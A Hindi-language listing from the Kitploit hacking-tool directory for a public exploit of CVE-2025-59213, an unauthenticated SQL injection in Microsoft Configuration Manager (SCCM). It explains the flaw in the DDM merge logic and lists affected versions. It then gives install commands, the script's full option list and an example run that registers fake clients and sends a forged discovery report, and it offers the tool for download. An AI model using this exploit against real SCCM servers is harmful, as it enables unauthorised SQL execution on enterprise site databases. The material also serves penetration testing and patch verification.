Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59213 — Microsoft Configuration Manager (SCCM) 2503 के लिए बिना प्रमाणीकरण के SQL इंजेक्शन शोषण, जो Discovery Data Manager DDM विधि के माध्यम से साइट डेटाबेस पर मनमानी SQL निष्पादन को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/synacktiv/cve-2025-59213
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubsynacktiv/cve-2025-59213

CVE-2025-59213

Microsoft Configuration Manager (SCCM) 2503 के लिए बिना प्रमाणीकरण के SQL इंजेक्शन शोषण, जो Discovery Data Manager DDM विधि के माध्यम से साइट डेटाबेस पर मनमानी SQL निष्पादन को सक्षम करता है।

रिपॉजिटरी देखें
323 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Microsoft Configuration Manager (ConfigMgr / SCCM) 2503 बिना प्रमाणीकरण के SQL इंजेक्शन (CVE-2025-59213) शोषण

यह स्क्रिप्ट CVE-2025-59213 भेद्यता का शोषण करती है, जो एक बिना प्रमाणीकरण वाले हमलावर को, जिसके पास प्रबंधन बिंदु (Management Point) तक नेटवर्क पहुंच है, डिस्कवरी डेटा प्रबंधक (DDM) DuplicateAMTMachineRecord विधि में SQL इंजेक्शन दोष का दुरुपयोग करके साइट डेटाबेस पर मनमाना SQL क्वेरी निष्पादित करने की अनुमति देती है, जहां दो ग्राहकों को विरोधाभासी हार्डवेयर आईडी के साथ मर्ज करने के दौरान अनएस्केप किए गए Hardware_ID0 फ़ील्ड को अनुचित रूप से संभाला जाता है।

जब KB34503790 अनुपस्थित हो, तो निम्नलिखित Microsoft Configuration Manager संस्करण सभी असुरक्षित हैं:

  • < 2503 (5.00.9135.1008)
  • < 2409 (5.00.9132.1029)
  • < 2403 (5.00.9128.1035)
  • <= 2303 (*)

आवश्यकताएँ

  • कुछ मामलों में, जब प्रबंधन बिंदु केवल HTTPS संचार मोड के साथ कॉन्फ़िगर किया गया हो, तो असुरक्षित HTTP सेवा के विरुद्ध पारस्परिक TLS प्रमाणीकरण करने के लिए PKI प्रमाणपत्र की आवश्यकता होती है। आंतरिक PKI द्वारा जारी कोई भी प्रमाणपत्र जिसका उद्देश्य ग्राहक प्रमाणीकरण (Client Authentication) हो, काम करेगा।
  • यदि आपके पास प्रमाणपत्र नहीं है, तो --altauth स्विच का उपयोग करें ()
अधिक जानकारी यहाँ

नोट्स

  • शोषण के लिए दो नकली ग्राहकों को पंजीकृत करने की आवश्यकता होती है, जिन्हें सफल SQL इंजेक्शन के बाद स्क्रिप्ट स्वचालित रूप से हटा देती है, जब तक कि --no-clean स्विच का उपयोग न किया गया हो या कोई पैच सफाई को ट्रिगर होने से रोकता हो।
  • चूंकि इंजेक्शन अतुल्यकालिक (asynchronous) है, समय-आधारित पेलोड अप्रभावी होते हैं क्योंकि निष्पादन और प्रतिक्रिया समय के बीच कोई सीधा संबंध नहीं होता है।

स्थापना

आप रिपॉजिटरी को क्लोन करके और निर्भरताएँ स्थापित करके इंस्टॉल कर सकते हैं।

root@kitploit:~
$ git clone https://github.com/synacktiv/CVE-2025-59213
$ cd CVE-2025-59213
$ python3 -m venv .venv && source .venv/bin/activate
$ python3 -m pip install -r requirements.txt

उपयोग

root@kitploit:~
 $ python3 CVE-2025-59213.py -h 
usage: CVE-2025-59213.py [-h] -t TARGET [-sk SIGKEY] [-k KEY] [-c CERT] [-v] -cn CLIENT_NAME [-rs REGISTRATION_SLEEP] [-a] -sql SQL [-nc]

CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection

options:
  -h, --help            show this help message and exit
  -t, --target TARGET   Target (http://sccm-mp.local/)
  -sk, --sigkey SIGKEY  SMS signature key (automatically generated if omitted)
  -k, --key KEY         Private key file for mTLS
  -c, --cert CERT       Certificate file for mTLS
  -v, --verbose         Verbose output, print requests
  -cn, --client-name CLIENT_NAME
                        Name of the client that will be created in SCCM
  -rs, --registration-sleep REGISTRATION_SLEEP
                        The amount of time, in seconds, that should be waited after registrating a new device (10 seconds by default)
  -a, --altauth         Use the MP's alternate authentication endpoint
  -sql SQL              Query to execute through the SQL injection
  -nc, --no-clean       Do not automatically clean the registred devices

उदाहरण

root@kitploit:~
$ python3 ./CVE-2025-59213.py -t https://cmc.corp.local --altauth -cn FAKE_CLIENT_NAME -sql 'select 1'
[+] Generated new signing key, saved to /tmp/sccm_poc.key
[+] CcmMessage : ID={D731ED0A-4474-497D-A191-D8948E17ECBF}
[+] Got SMSID = GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F for new client FAKE_CLIENT_NAME
[+] CcmMessage : ID={23EEE9B8-7971-4560-9D18-9328C5DF0C2E}
[+] Got SMSID = GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69 for new client FAKE_CLIENT_NAME
[+] Sending DDR report: SMSID=GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F OLDSMSID=GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69
[+] CcmMessage : ID={88B6BEBD-1F99-4BD2-8786-6BD3C6CFF299}
[+] CcmMessage : adding clientauth
[+] CcmMessage : adding attachment
[+] DDR report sent successfully
टूल डाउनलोड करें